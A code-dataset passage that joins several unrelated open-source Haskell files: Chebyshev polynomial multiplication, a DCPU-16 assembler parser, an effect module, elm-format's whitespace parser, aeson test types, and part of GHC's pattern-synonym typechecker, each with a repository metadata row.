-- (PolyCoeffBall c, CanNormalize (ChPoly c))
-- =>
(c~MPBall) =>
(ChPoly c) -> (ChPoly c) -> (ChPoly c)
mulChebUseBounds cp1@(ChPoly d1 _p1 _acG1 bnds1) cp2@(ChPoly d2 _p2 _acG2 bnds2)
| d1 == d2 =
case (chPolyBounds_valueIfConst bnds1, chPolyBounds_valueIfConst bnds2) of
(Just b1, _) -> b1 * cp2
(_, Just b2) -> cp1 * b2
_ -> updateRadius (+ e) resultC
| otherwise = error $ "Multiplying polynomials with incompatible domains"
where
resultC = mulChebNoBounds cp1C cp2C
(cp1C, e1) = centreAsBallAndRadius cp1
(cp2C, e2) = centreAsBallAndRadius cp2
(ChPolyBounds pmin1 pmax1) = bnds1
(ChPolyBounds pmin2 pmax2) = bnds2
bnd1 = errorBound $ (abs pmin1) `max` (abs pmax1)
bnd2 = errorBound $ (abs pmin2) `max` (abs pmax2)
e = e1 * bnd2 + e2 * bnd1 + e1 * e2
mulChebNoBounds ::
-- (PolyCoeffBall c, CanNormalize (ChPoly c))
-- =>
(c~MPBall) =>
(ChPoly c) -> (ChPoly c) -> (ChPoly c)
mulChebNoBounds p1@(ChPoly _ (Poly terms1) _acG1 _) p2@(ChPoly _ (Poly terms2) _acG2 _) =
maybeTrace
(printf "mulCheb: ac p1 = %s, ac p2 = %s, acG p1 = %s, acG p2 = %s, size1+size2 = %d, using %s, ac result = %s, prec result = %s"
(show $ getAccuracy p1) (show $ getAccuracy p2)
(show $ getAccuracyGuide p1) (show $ getAccuracyGuide p2)
(size1 + size2) methodS
(show $ getAccuracy result) (show $ getPrecision result)
) $
result
where
(result, methodS)
| getAccuracy p1 /= Exact || getAccuracy p2 /= Exact || size1 + size2 < 1000
-- TODO: improve the condition based on benchmarks
= (mulChebDirect p1 p2, "mulChebDirect")
| otherwise
= (mulChebDCT p1 p2, "mulChebDCT")
size1 = terms_size terms1
size2 = terms_size terms2
mulChebDirect ::
-- (PolyCoeffRing c, CanMulBy c Dyadic, CanNormalize (ChPoly c), CanSetPrecision c)
-- =>
(c~MPBall) =>
(ChPoly c) -> (ChPoly c) -> (ChPoly c)
mulChebDirect _cp1@(ChPoly d1 p1 acG1 _) _cp2@(ChPoly d2 p2 acG2 _)
| d1 /= d2 = error $ "Multiplying ChPoly values with incompatible domains"
| otherwise = result
where
result =
normalize $ ChPoly d1 (Poly terms) (max acG1 acG2) (chPolyBounds_forChPoly result)
terms =
terms_fromListAddCoeffs $
concat
[ let c = a*b*(dyadic 0.5) in [(i+j, c), (abs (i-j), c)]
|
(i,a) <- terms_toList terms1,
(j,b) <- terms_toList terms2
]
(Poly terms1) = p1 -- setPrecision prc p1
(Poly terms2) = p2 -- setPrecision prc p2
-- prc = (getPrecision p1) `max` (getPrecision p2) `max` (prec $ 2 `max` ((fromAccuracy (acG1 `min` acG2)) * deg))
-- deg = degree cp1 + degree cp2
mulChebDCT ::
-- (PolyCoeffBall c, CanNormalize (ChPoly c), CanSetPrecision c)
-- =>
(c~MPBall) =>
(ChPoly c) -> (ChPoly c) -> (ChPoly c)
mulChebDCT = lift2_DCT (+) (*)
{- integer power -}
{-TODO: Enable as soon as we have HasIntegers (ChPoly MPBall)
which will need convertExactlyFromSample.
instance
(c ~ MPBall) =>
CanPow (ChPoly c) Integer where
pow = powUsingMul
instance
(c ~ MPBall) =>
CanPow (ChPoly c) Int where
pow = powUsingMul
-}
| michalkonecny/aern2 | aern2-fun-univariate/src/AERN2/Poly/Cheb/Ring.hs | bsd-3-clause | 5,178 | 0 | 16 | 1,173 | 1,323 | 713 | 610 | -1 | -1 |
{-# LANGUAGE OverloadedStrings #-}
module Parser where
import Control.Applicative ((<*>), (<$>), (*>), (<*), (<|>), pure)
import qualified Data.Attoparsec.Text as P
import qualified Data.Attoparsec.Combinator as PC
import qualified Data.Text as T
import Data.Text (Text)
import Data.Word (Word16)
import Data.Char (isAlpha)
import qualified CommonTypes as CT
-- | Run the assembler parser over the whole input, feeding an empty final
-- chunk so attoparsec can never stay in a 'Partial' state.  Any parse
-- failure is fatal and reported via 'error'.
parse :: Text -> Program
parse input = finish (P.feed (P.parse program input) T.empty)
  where
    finish (P.Done _ prog)   = prog
    finish (P.Partial _)     = error "Parsing only partially finished!"
    finish (P.Fail _ ctxs e) =
      error ("Parsing failed because of: " ++ show e ++ ", at: " ++ show ctxs)
-- | A program is a sequence of lines consumed until end of input.
program :: P.Parser Program
program = PC.manyTill line P.endOfInput

-- | A line is any number of whitespace-led statements terminated by a
-- newline (or end of input, so a missing trailing newline still parses).
line :: P.Parser Line
line = PC.manyTill (skipWS *> statement) (P.endOfLine <|> P.endOfInput)

-- | A statement: tried in order -- basic instruction, non-basic
-- instruction, label definition, comment.
statement :: P.Parser Statement
statement = instruction
        <|> nonBasicInstruction
        <|> label
        <|> comment
-- | Basic instruction: an opcode followed by two comma-separated operands,
-- e.g. @SET A, 0x30@.
instruction :: P.Parser Statement
instruction = Instruction
          <$> opcode
          <*> (skipWS *> value)
          <*> (P.char ',' *> skipWS *> value)

-- | Non-basic instruction: an opcode followed by a single operand,
-- e.g. @JSR label@.
nonBasicInstruction :: P.Parser Statement
nonBasicInstruction = NonBasicInstruction
                  <$> nonBasicOpcode
                  <*> (skipWS *> value)

-- | Label definition: a colon followed by an alphabetic name, e.g. @:loop@.
label :: P.Parser Statement
label = Label <$> (P.char ':' *> P.takeWhile1 isAlpha)

-- | Comment: a semicolon, then everything up to the end of the line.
comment :: P.Parser Statement
comment = Comment <$> (P.char ';' *> skipWS *> P.takeTill P.isEndOfLine)
-- | The only non-basic opcode recognised is @JSR@.
nonBasicOpcode :: P.Parser CT.NonBasicOpcode
nonBasicOpcode = P.string "JSR" *> pure CT.JSR

-- | Parse a basic opcode mnemonic.  Table-driven instead of a fifteen-way
-- hand-written alternative chain: less repetition and no chance of a
-- mnemonic/constructor mismatch.  attoparsec's 'P.string' backtracks on
-- failure, so trying the mnemonics in sequence is safe.
opcode :: P.Parser CT.Opcode
opcode = PC.choice [ P.string name *> pure op | (name, op) <- mnemonics ]
  where
    -- Mnemonic table, in the same order as the original alternatives.
    mnemonics =
      [ ("SET", CT.SET), ("ADD", CT.ADD), ("SUB", CT.SUB), ("MUL", CT.MUL)
      , ("DIV", CT.DIV), ("MOD", CT.MOD), ("SHL", CT.SHL), ("SHR", CT.SHR)
      , ("AND", CT.AND), ("BOR", CT.BOR), ("XOR", CT.XOR), ("IFE", CT.IFE)
      , ("IFN", CT.IFN), ("IFG", CT.IFG), ("IFB", CT.IFB)
      ]
-- | Operand parser.  More specific forms come first: bracketed RAM
-- references, registers, the special names (SP/PC/O/POP/PEEK/PUSH), then
-- numeric literals and finally bare label references.
value :: P.Parser Value
value = ramValue
    <|> (Register <$> register)
    <|> sp
    <|> pc
    <|> o
    <|> pop
    <|> peek
    <|> push
    <|> (Literal <$> literal)
    <|> (LabelValue <$> labelText)

-- | A label name: one or more alphabetic characters.
labelText :: P.Parser Text
labelText = P.takeWhile1 isAlpha
-- | A memory operand in square brackets, e.g. @[0x10]@, @[A]@ or @[0x10+A]@.
ramValue :: P.Parser Value
ramValue = RamValue <$> (P.char '[' *> skipWS *> ramAddress <* skipWS <* P.char ']')

-- | The address inside a bracketed operand.  The @literal+register@ form is
-- tried first because its prefix overlaps plain literals and registers
-- (attoparsec backtracks across '<|>').
ramAddress :: P.Parser RamAddress
ramAddress = (uncurry AtLiteralPlusReg <$> literalPlusReg)
         <|> (AtRegister <$> register)
         <|> (AtLiteral <$> literal)
         <|> (AtLabel <$> labelText)

-- | @literal+register@ or @register+literal@; both spellings are normalised
-- to the (literal, register) order.
literalPlusReg :: P.Parser (Word16, CT.RegName)
literalPlusReg = ((,) <$> literal <*> (plus *> register))
             <|> (swap <$> register <*> (plus *> literal))
  where
    swap rn l = (l, rn)
    plus = skipWS *> P.char '+' *> skipWS
-- | A numeric literal: hexadecimal with an @0x@ prefix, otherwise decimal.
literal :: P.Parser Word16
literal = (P.string "0x" *> P.hexadecimal) <|> P.decimal

-- | One of the eight general-purpose register names.
register :: P.Parser CT.RegName
register = P.char 'A' *> pure CT.A
       <|> P.char 'B' *> pure CT.B
       <|> P.char 'C' *> pure CT.C
       <|> P.char 'X' *> pure CT.X
       <|> P.char 'Y' *> pure CT.Y
       <|> P.char 'Z' *> pure CT.Z
       <|> P.char 'I' *> pure CT.I
       <|> P.char 'J' *> pure CT.J

-- Parsers for the special operand keywords.  (They carry no signatures in
-- the original; each has type @P.Parser Value@.)
sp = P.string "SP" *> pure SP
pc = P.string "PC" *> pure PC
o = P.char 'O' *> pure O
pop = P.string "POP" *> pure POP
peek = P.string "PEEK" *> pure PEEK
push = P.string "PUSH" *> pure PUSH

-- Skip zero or more horizontal whitespace characters.
skipWS = P.skipWhile P.isHorizontalSpace

-- GHCi helper: run a parser over a plain 'String' and finish the input.
ps parser str = P.feed (P.parse parser $ T.pack str) T.empty
-- | A parsed assembly source: one entry per input line.
type Program = [Line]

-- | All statements found on a single source line.
type Line = [Statement]

-- | One parsed statement.
data Statement = Instruction CT.Opcode Value Value
               | NonBasicInstruction CT.NonBasicOpcode Value
               | Label Text
               | Comment Text
               deriving (Show)

-- | An instruction operand.
data Value = RamValue RamAddress | Register CT.RegName | SP | PC | O
           | POP | PEEK | PUSH | Literal Word16 | LabelValue Text
           deriving (Show)

-- | The address form used inside a bracketed (memory) operand.
data RamAddress = AtLiteral Word16 | AtRegister CT.RegName | AtLabel Text
                | AtLiteralPlusReg Word16 CT.RegName
                deriving (Show)
| dan-t/dcpu16 | Parser.hs | bsd-3-clause | 4,448 | 0 | 35 | 1,280 | 1,558 | 798 | 760 | 113 | 3 |
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE FlexibleContexts #-}
{-# LANGUAGE GADTs #-}
{-# LANGUAGE TypeOperators #-}
module Control.Eff.Select where
import Control.Eff
-- | Nondeterministic-choice effect: a 'Select' request offers a list of
-- candidate values to choose from.
data Select x where
  Select :: [a] -> Select a

-- | Choose one element from the given list of alternatives.
select :: (Select :< effs) => [a] -> Eff effs a
select xs = eta (Select xs)

-- | Handle the 'Select' effect by running the continuation against every
-- alternative and concatenating all results.
runSelect :: Eff (Select ': effs) a -> Eff effs [a]
runSelect = eliminate (\a -> pure [a]) (\(Select xs) k -> concat <$> mapM k xs)
| mitchellwrosen/effects-a-la-carte | src/Control/Eff/Select.hs | bsd-3-clause | 451 | 0 | 9 | 106 | 161 | 89 | 72 | 12 | 1 |
module Parse.Whitespace where
import AST.V0_16
import qualified Cheapskate.Types as Markdown
import qualified Data.Char as Char
import Parse.IParser
import qualified Parse.Markdown as Markdown
import qualified Parse.State as State
import qualified Reporting.Error.Syntax as Syntax
import Parse.ParsecAdapter hiding (newline, spaces, State)
-- | Run a parser with optional whitespace (and comments) on both sides,
-- attaching the surrounding comments to the result.
padded :: IParser a -> IParser (C2 before after a)
padded inner =
    wrap <$> whitespace <*> inner <*> whitespace
  where
    wrap before result after = C (before, after) result
-- | One or more units of same-line whitespace, collecting any comments seen.
-- A unit is a literal space, the special @{--}@ comment-trick opener, or a
-- block comment.
spaces :: IParser Comments
spaces =
  let
    blank = string " " >> return []
    comment = ((: []) <$> multiComment)
    space =
      blank
        <|> (const [CommentTrickOpener] <$> (try $ string "{--}"))
        <|> comment
        <?> Syntax.whitespace
  in
    concat <$> many1 space
-- | Mandatory whitespace: either same-line spaces optionally followed by
-- newline-led whitespace, or at least one newline-led group.  Fails when
-- there is no whitespace at all.
forcedWS :: IParser Comments
forcedWS =
  choice
    [ (++) <$> spaces <*> (concat <$> many nl_space)
    , concat <$> many1 nl_space
    ]
  where
    nl_space =
      try ((++) <$> (concat <$> many1 newline) <*> option [] spaces)
-- Just eats whitespace until the next meaningful character.
dumbWhitespace :: IParser Comments
dumbWhitespace =
  concat <$> many (spaces <|> newline)

-- | Like 'whitespace', but also reports whether any whitespace was present.
whitespace' :: IParser (Bool, Comments)
whitespace' =
  option (False, []) ((,) True <$> forcedWS)

-- | Optional whitespace; returns the comments found (possibly none).
whitespace :: IParser Comments
whitespace =
  snd <$> whitespace'
-- | Whitespace that must contain at least one line break, i.e. the next
-- token starts on a fresh line.
freshLine :: IParser Comments
freshLine =
    concat <$> (try ((++) <$> many1 newline <*> many space_nl) <|> try (many1 space_nl)) <?> Syntax.freshLine
  where
    space_nl = try $ (++) <$> spaces <*> (concat <$> many1 newline)

-- | A line break: either a literal newline (no comment produced) or a line
-- comment, which itself terminates the line.
newline :: IParser Comments
newline =
  (simpleNewline >> return []) <|> ((\x -> [x]) <$> lineComment) <?> Syntax.newline
-- | A plain line terminator (CRLF or LF).  Also records in the parser
-- state that a newline was seen (consumed by 'trackNewline').
simpleNewline :: IParser ()
simpleNewline =
  do  _ <- try (string "\r\n") <|> string "\n"
      updateState State.setNewline
      return ()
-- | Run a parser and report whether it consumed any newline, expressed as
-- the 'Multiline' layout hint (SplitAll if a newline was seen, else JoinAll).
trackNewline :: IParser a -> IParser (a, Multiline)
trackNewline parser =
  do
    updateState State.pushNewlineContext
    a <- parser
    state <- getState
    updateState State.popNewlineContext
    return (a, if State.sawNewline state then SplitAll else JoinAll)
-- | A @--@ line comment.  The special form @--}@ (followed only by spaces
-- and a line end) is the closing half of the "comment trick".
lineComment :: IParser Comment
lineComment =
  do  _ <- try (string "--")
      choice
        [ const CommentTrickCloser
            <$> try (char '}' >> many (char ' ') >> (simpleNewline <|> eof))
        , do
            (comment, ()) <-
              anyUntil $ simpleNewline <|> eof
            return $ LineComment comment
        ]

-- | Consume trailing spaces and, if present, the text of a trailing @--@
-- comment (without the dashes); 'Nothing' when the rest of the line is
-- empty.
restOfLine :: IParser (Maybe String)
restOfLine =
    many (char ' ') *>
      choice
        [ Just . fst <$> (try (string "--") *> (anyUntil $ (lookAhead simpleNewline) <|> eof))
        , return Nothing
        ]
-- | A @{-|@ documentation comment; returns the raw body text (without the
-- delimiters and the leading spaces).
docComment :: IParser String
docComment =
  do  _ <- try (string "{-|")
      _ <- many (string " ")
      closeComment False

-- | A documentation comment parsed into Markdown blocks.
docCommentAsMarkdown :: IParser Markdown.Blocks
docCommentAsMarkdown =
  Markdown.parse <$> docComment
-- | A @{- ... -}@ block comment (but not a @{-|@ doc comment).  A @{--@
-- opener marks a "comment trick" block; otherwise the body is split into
-- lines with the common leading indentation of the continuation lines
-- stripped.
multiComment :: IParser Comment
multiComment =
  do  _ <- try (string "{-" <* notFollowedBy (string "|") )
      isCommentTrick <-
        choice
          [ char '-' >> return True
          , return False
          ]
      _ <- many (string " ")
      b <- closeComment False
      return $
        if isCommentTrick then
          CommentTrickBlock b
        else
          BlockComment $ trimIndent $ lines b
  where
    trimIndent [] = []
    trimIndent (l1:ls) =
      let
        -- Indent of each continuation line that is not all-whitespace
        -- (lines where indent == length are filtered out).
        leadingIndents =
          map fst $ filter (uncurry (/=))
            $ map (\l -> (length $ takeWhile Char.isSpace l, length l)) ls

        depth =
          case leadingIndents of
            [] -> 0
            _ -> minimum leadingIndents
      in
        l1 : map (drop depth) ls
-- | Consume text up to the matching @-}@, handling nested @{- -}@ pairs
-- recursively.  The flag says whether the closing punctuation of nested
-- comments is kept in the returned text.
closeComment :: Bool -> IParser String
closeComment keepClosingPunc =
  uncurry (++) <$>
    anyUntil
      (choice
        [ try ((\a b -> if keepClosingPunc then concat (a ++ [b]) else "") <$> many (string " ") <*> string "-}") <?> "the end of a comment -}"
        , concat <$> sequence [ try (string "{-"), closeComment True, closeComment keepClosingPunc]
        ])
-- | Collect characters one at a time until the terminator parser succeeds;
-- returns the collected text together with the terminator's result.
anyUntil :: IParser a -> IParser (String, a)
anyUntil end =
    go ""
  where
    next pre =
      do
        nextChar <- anyChar
        go (nextChar : pre)

    -- Characters are accumulated in reverse and flipped on success.
    go pre =
      ((,) (reverse pre) <$> end) <|> next pre
| avh4/elm-format | elm-format-lib/src/Parse/Whitespace.hs | bsd-3-clause | 4,408 | 0 | 21 | 1,322 | 1,476 | 751 | 725 | 126 | 4 |
{-# LANGUAGE CPP #-}
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE GADTs #-}
{-# LANGUAGE GeneralizedNewtypeDeriving #-}
{-# LANGUAGE NoImplicitPrelude #-}
{-# LANGUAGE ScopedTypeVariables #-}
{-# LANGUAGE StandaloneDeriving #-}
module Types (module Types) where
import Prelude.Compat
import Math.NumberTheory.Logarithms (intLog2)
import Control.Applicative ((<$>))
import Data.Data
import Data.Functor.Compose (Compose (..))
import Data.Functor.Identity (Identity (..))
import Data.Hashable (Hashable (..))
#if !MIN_VERSION_base(4,16,0)
import Data.Semigroup (Option)
#endif
import Data.Text
import Data.Time (Day (..), fromGregorian)
import GHC.Generics
import Test.QuickCheck (Arbitrary (..), Property, counterexample, scale)
import qualified Data.Map as Map
import Data.Aeson
import Data.Aeson.Types
type I = Identity

type Compose3  f g h = Compose (Compose f g) h
type Compose3' f g h = Compose f (Compose g h)

-- | A record mixing several field types, used to exercise the generic and
-- TH encodings.
data Foo = Foo {
      fooInt :: Int
    , fooDouble :: Double
    , fooTuple :: (String, Text, Int)
    -- This definition causes an infinite loop in genericTo and genericFrom!
    -- , fooMap :: Map.Map String Foo
    , fooMap :: Map.Map String (Text,Int)
    } deriving (Show, Typeable, Data)

-- | A record whose field names differ only in their prefix/casing, to
-- exercise field-label modification.
data UFoo = UFoo {
      _UFooInt :: Int
    , uFooInt :: Int
    } deriving (Show, Eq, Data, Typeable)

data OneConstructor = OneConstructor
                      deriving (Show, Eq, Typeable, Data)

data Product2 a b = Product2 a b
                    deriving (Show, Eq, Typeable, Data)

data Product6 a b c d e f = Product6 a b c d e f
                            deriving (Show, Eq, Typeable, Data)

data Sum4 a b c d = Alt1 a | Alt2 b | Alt3 c | Alt4 d
                    deriving (Show, Eq, Typeable, Data)

-- | Approximate equality, for types where exact round-tripping is not
-- guaranteed (e.g. floating point).
class ApproxEq a where
    (=~) :: a -> a -> Bool

newtype Approx a = Approx { fromApprox :: a }
    deriving (Show, Data, Typeable, ApproxEq, Num)

-- 'Eq' via approximate equality of the wrapped values.
instance (ApproxEq a) => Eq (Approx a) where
    Approx a == Approx b = a =~ b

data Nullary = C1 | C2 | C3 deriving (Eq, Show)

-- | Covers the interesting constructor shapes in one sum type: nullary,
-- unary, product, record and list.
data SomeType a = Nullary
                | Unary Int
                | Product String (Maybe Char) a
                | Record { testOne   :: Double
                         , testTwo   :: Maybe Bool
                         , testThree :: Maybe a
                         }
                | List [a]
                  deriving (Eq, Show)

-- | This type requires IncoherentInstances for the instances of the type
-- classes Data.Aeson.TH.LookupField and Data.Aeson.Types.FromJSON.FromRecord.
--
-- The minimum known requirements for this type are:
-- * Record type with at least two fields
-- * One field type is either a type parameter or a type/data family
-- * Another field type is a @Maybe@ of the above field type
data IncoherentInstancesNeeded a = IncoherentInstancesNeeded
  { incoherentInstancesNeededMaybeNot :: a
  , incoherentInstancesNeededMaybeYes :: Maybe a
  } deriving Generic

-- Used for testing UntaggedValue SumEncoding
data EitherTextInt
    = LeftBool Bool
    | RightInt Int
    | BothTextInt Text Int
    | NoneNullary
    deriving (Eq, Show)

-- | A GADT with a single, type-restricted constructor; instances must be
-- derived standalone because of the constrained result type.
data GADT a where
    GADT :: { gadt :: String } -> GADT String
  deriving Typeable

deriving instance Data (GADT String)
deriving instance Eq   (GADT a)
deriving instance Show (GADT a)

newtype MaybeField = MaybeField { maybeField :: Maybe Int }

#if !MIN_VERSION_base(4,16,0)
newtype OptionField = OptionField { optionField :: Option Int }
  deriving (Eq, Show)
#endif

-- Standalone Generic instances for the types above.
deriving instance Generic Foo
deriving instance Generic UFoo
deriving instance Generic OneConstructor
deriving instance Generic (Product2 a b)
deriving instance Generic (Product6 a b c d e f)
deriving instance Generic (Sum4 a b c d)
deriving instance Generic (Approx a)
deriving instance Generic Nullary
deriving instance Generic (SomeType a)
deriving instance Generic1 SomeType
#if !MIN_VERSION_base(4,16,0)
deriving instance Generic OptionField
#endif
deriving instance Generic EitherTextInt
-- | A QuickCheck property that always fails, with a counterexample message
-- naming the function under test, the reason, and the offending value.
failure :: Show a => String -> String -> a -> Property
failure fnName reason value =
    counterexample message False
  where
    message = fnName ++ " failed: " ++ reason ++ ", " ++ show value
-- | A 'Day' whose generator is shifted by 'zeroDay', so that -- judging by
-- the name -- arbitrary values also cover dates before the common era.
newtype BCEDay = BCEDay Day
  deriving (Eq, Show)

-- NOTE(review): 'fromGregorian' clips out-of-range month/day arguments, so
-- this is effectively year 0, January 1st.
zeroDay :: Day
zeroDay = fromGregorian 0 0 0

instance Arbitrary BCEDay where
  arbitrary = fmap (BCEDay . ModifiedJulianDay . (+ toModifiedJulianDay zeroDay)) arbitrary

-- JSON representation is exactly that of the wrapped 'Day'.
instance ToJSON BCEDay where
  toJSON (BCEDay d) = toJSON d
  toEncoding (BCEDay d) = toEncoding d

instance FromJSON BCEDay where
  parseJSON = fmap BCEDay . parseJSON
-- | Newtype whose 'Arbitrary' instance scales the QuickCheck size
-- parameter down logarithmically (via 'intLog2'), keeping generated
-- structures small; every other instance simply delegates to the wrapped
-- value.
newtype LogScaled a = LogScaled { getLogScaled :: a }
  deriving (Eq, Ord, Show)

instance Hashable a => Hashable (LogScaled a) where
  hashWithSalt salt (LogScaled a) = hashWithSalt salt a

instance Arbitrary a => Arbitrary (LogScaled a) where
  -- The +1 keeps 'intLog2' total at size 0.
  arbitrary = LogScaled <$> scale (\x -> intLog2 $ x + 1) arbitrary
  shrink = fmap LogScaled . shrink . getLogScaled

instance ToJSON a => ToJSON (LogScaled a) where
  toJSON (LogScaled d) = toJSON d
  toEncoding (LogScaled d) = toEncoding d

instance FromJSON a => FromJSON (LogScaled a) where
  parseJSON = fmap LogScaled . parseJSON

instance (ToJSONKey a) => ToJSONKey (LogScaled a) where
  toJSONKey = contramapToJSONKeyFunction getLogScaled toJSONKey
  toJSONKeyList = contramapToJSONKeyFunction (fmap getLogScaled) toJSONKeyList

instance (FromJSONKey a) => FromJSONKey (LogScaled a) where
  fromJSONKey = fmap LogScaled fromJSONKey
  fromJSONKeyList = coerceFromJSONKeyFunction (fromJSONKeyList :: FromJSONKeyFunction [a])
| dmjio/aeson | tests/Types.hs | bsd-3-clause | 5,606 | 1 | 11 | 1,242 | 1,549 | 867 | 682 | 124 | 1 |
{-
(c) The University of Glasgow 2006
(c) The GRASP/AQUA Project, Glasgow University, 1992-1998
\section[TcPatSyn]{Typechecking pattern synonym declarations}
-}
{-# LANGUAGE CPP #-}
module TcPatSyn ( tcInferPatSynDecl, tcCheckPatSynDecl
, tcPatSynBuilderBind, tcPatSynBuilderOcc, nonBidirectionalErr
) where
import HsSyn
import TcPat
import TcRnMonad
import TcEnv
import TcMType
import TysPrim
import TypeRep
import Name
import SrcLoc
import PatSyn
import NameSet
import Panic
import Outputable
import FastString
import Var
import Id
import IdInfo( IdDetails(..), RecSelParent(..))
import TcBinds
import BasicTypes
import TcSimplify
import TcUnify
import TcType
import TcEvidence
import BuildTyCl
import VarSet
import MkId
import VarEnv
import Inst
import TcTyDecls
import ConLike
import FieldLabel
#if __GLASGOW_HASKELL__ < 709
import Data.Monoid
#endif
import Bag
import Util
import Data.Maybe
import Control.Monad (forM)
#include "HsVersions.h"
{-
************************************************************************
* *
Type checking a pattern synonym
* *
************************************************************************
-}
-- | Typecheck a pattern synonym declared without a signature: infer a type
-- for the pattern, split the quantified tyvars into universals and
-- existentials (the latter being those bound inside the pattern), and hand
-- everything to 'tc_patsyn_finish'.
tcInferPatSynDecl :: PatSynBind Name Name
                  -> TcM (PatSyn, LHsBinds Id, TcGblEnv)
tcInferPatSynDecl PSB{ psb_id = lname@(L loc name), psb_args = details,
                       psb_def = lpat, psb_dir = dir }
  = setSrcSpan loc $
    do { traceTc "tcInferPatSynDecl {" $ ppr name
       ; tcCheckPatSynPat lpat

       ; let (arg_names, rec_fields, is_infix) = collectPatSynArgInfo details
         -- Infer a type for the pattern and the argument variables while
         -- capturing the constraints the pattern generates.
       ; ((lpat', (args, pat_ty)), tclvl, wanted)
            <- pushLevelAndCaptureConstraints $
               do { pat_ty <- newFlexiTyVarTy openTypeKind
                  ; tcPat PatSyn lpat pat_ty $
                    do { args <- mapM tcLookupId arg_names
                       ; return (args, pat_ty) } }

       ; let named_taus = (name, pat_ty) : map (\arg -> (getName arg, varType arg)) args

       ; (qtvs, req_dicts, ev_binds) <- simplifyInfer tclvl False [] named_taus wanted

         -- Tyvars and dictionaries bound by the pattern itself are
         -- existential/provided; the remaining qtvs are universal.
       ; (ex_vars, prov_dicts) <- tcCollectEx lpat'
       ; let univ_tvs   = filter (not . (`elemVarSet` ex_vars)) qtvs
             ex_tvs     = varSetElems ex_vars
             prov_theta = map evVarPred prov_dicts
             req_theta  = map evVarPred req_dicts

       ; traceTc "tcInferPatSynDecl }" $ ppr name
       ; tc_patsyn_finish lname dir is_infix lpat'
                          (univ_tvs, req_theta, ev_binds, req_dicts)
                          (ex_tvs, map mkTyVarTy ex_tvs, prov_theta, emptyTcEvBinds, prov_dicts)
                          (zip args $ repeat idHsWrapper)
                          pat_ty rec_fields }
-- | Typecheck a pattern synonym that has a type signature: check the
-- pattern against the signature's result type, unify the argument types
-- (with the declared existentials turned into SigTyVars), and check the
-- provided context is satisfiable from the dictionaries the pattern binds.
tcCheckPatSynDecl :: PatSynBind Name Name
                  -> TcPatSynInfo
                  -> TcM (PatSyn, LHsBinds Id, TcGblEnv)
tcCheckPatSynDecl PSB{ psb_id = lname@(L loc name), psb_args = details,
                       psb_def = lpat, psb_dir = dir }
                  TPSI{ patsig_tau = tau,
                        patsig_ex = ex_tvs, patsig_univ = univ_tvs,
                        patsig_prov = prov_theta, patsig_req = req_theta }
  = setSrcSpan loc $
    do { traceTc "tcCheckPatSynDecl" $
         ppr (ex_tvs, prov_theta) $$
         ppr (univ_tvs, req_theta) $$
         ppr arg_tys $$
         ppr tau
       ; tcCheckPatSynPat lpat

       ; req_dicts <- newEvVars req_theta

       -- TODO: find a better SkolInfo
       ; let skol_info = SigSkol (PatSynCtxt name) (mkFunTys arg_tys pat_ty)

       ; let (arg_names, rec_fields, is_infix) = collectPatSynArgInfo details

       ; let ty_arity = length arg_tys
       ; checkTc (length arg_names == ty_arity)
                 (wrongNumberOfParmsErr ty_arity)

         -- Typecheck the pattern against pat_ty, then unify the type of args
         -- against arg_tys, with ex_tvs changed to SigTyVars.
         -- We get out of this:
         --  * The evidence bindings for the requested theta: req_ev_binds
         --  * The typechecked pattern: lpat'
         --  * The arguments, type-coerced to the SigTyVars: wrapped_args
         --  * The instantiation of ex_tvs to pass to the success continuation: ex_tys
         --  * The provided theta substituted with the SigTyVars: prov_theta'
       ; (implic1, req_ev_binds, (lpat', (ex_tys, prov_theta', wrapped_args))) <-
           buildImplication skol_info univ_tvs req_dicts $
           tcPat PatSyn lpat pat_ty $ do
           { ex_sigtvs <- mapM (\tv -> newSigTyVar (getName tv) (tyVarKind tv)) ex_tvs
           ; let subst = mkTvSubst (mkInScopeSet (zipVarEnv ex_sigtvs ex_sigtvs)) $
                         zipTyEnv ex_tvs (map mkTyVarTy ex_sigtvs)
           ; let ex_tys = substTys subst $ map mkTyVarTy ex_tvs
                 prov_theta' = substTheta subst prov_theta
           ; wrapped_args <- forM (zipEqual "tcCheckPatSynDecl" arg_names arg_tys) $ \(arg_name, arg_ty) -> do
               { arg <- tcLookupId arg_name
               ; let arg_ty' = substTy subst arg_ty
               ; coi <- unifyType (varType arg) arg_ty'
               ; return (setVarType arg arg_ty, coToHsWrapper coi) }
           ; return (ex_tys, prov_theta', wrapped_args) }

       ; (ex_vars_rhs, prov_dicts_rhs) <- tcCollectEx lpat'
       ; let ex_tvs_rhs = varSetElems ex_vars_rhs

         -- Check that prov_theta' can be satisfied with the dicts from the pattern
       ; (implic2, prov_ev_binds, prov_dicts) <-
           buildImplication skol_info ex_tvs_rhs prov_dicts_rhs $ do
           { let origin = PatOrigin -- TODO
           ; emitWanteds origin prov_theta' }

       -- Solve the constraints now, because we are about to make a PatSyn,
       -- which should not contain unification variables and the like (Trac #10997)
       -- Since all the inputs are implications the returned bindings will be empty
       ; _ <- simplifyTop (emptyWC `addImplics` (implic1 `unionBags` implic2))

       ; traceTc "tcCheckPatSynDecl }" $ ppr name
       ; tc_patsyn_finish lname dir is_infix lpat'
                          (univ_tvs, req_theta, req_ev_binds, req_dicts)
                          (ex_tvs, ex_tys, prov_theta, prov_ev_binds, prov_dicts)
                          wrapped_args
                          pat_ty rec_fields }
  where
    (arg_tys, pat_ty) = tcSplitFunTys tau
-- | Extract from the declared pattern-synonym details: the argument names,
-- the record selector names (empty unless it is a record pattern synonym),
-- and whether the synonym was declared infix.
collectPatSynArgInfo :: HsPatSynDetails (Located Name) -> ([Name], [Name], Bool)
collectPatSynArgInfo (PrefixPatSyn names)     = (map unLoc names, [], False)
collectPatSynArgInfo (InfixPatSyn left right) = (map unLoc [left, right], [], True)
collectPatSynArgInfo (RecordPatSyn fields)    = (patVars, selectors, False)
  where
    (patVars, selectors) = unzip (map fieldNames fields)

    -- One record field yields a pattern variable and a selector name.
    fieldNames :: RecordPatSynField (Located Name) -> (Name, Name)
    fieldNames (RecordPatSynField { recordPatSynPatVar     = L _ patVar
                                  , recordPatSynSelectorId = L _ selId })
      = (patVar, selId)
-- | Error message when the declared argument count of a pattern synonym
-- disagrees with the arity of its signature.
wrongNumberOfParmsErr :: Arity -> SDoc
wrongNumberOfParmsErr ty_arity =
  hsep [ ptext (sLit "Number of pattern synonym arguments doesn't match type; expected")
       , ppr ty_arity ]
-------------------------
